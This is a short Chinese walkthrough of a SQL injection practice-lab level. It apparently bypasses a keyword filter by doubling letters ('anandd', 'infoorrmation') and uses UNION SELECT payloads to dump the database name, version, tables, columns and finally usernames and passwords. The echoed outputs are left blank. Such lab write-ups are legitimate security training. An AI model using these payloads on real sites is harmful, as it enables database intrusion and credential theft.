首先判断一下是否为数字型注入
输入如下
id=1 anandd 1=2
回显如下
没有回显 说明属于数字型
佐证一下
输入如下
1--+
回显如下
但是从刚才的经历看出缺乏报错信息 所以不能使用报错注入 但是可以使用联合注入
开始爆回显点
输入如下
id=-1 union select 1,2,3--+
回显如下
爆库和版本号
输入如下
id=-1 union select 1,database(),version();--+
回显如下
爆表
输入如下
id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database();--+
回显如下
爆字段
输入如下
id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema=database();--+
回显如下
爆用户名和密码 输入如下
id=-1 union select 1,2,group_concat(username,passwoorrd) from users;--+
回显如下
源代码和上一关的一模一样
成功!!嗨嗨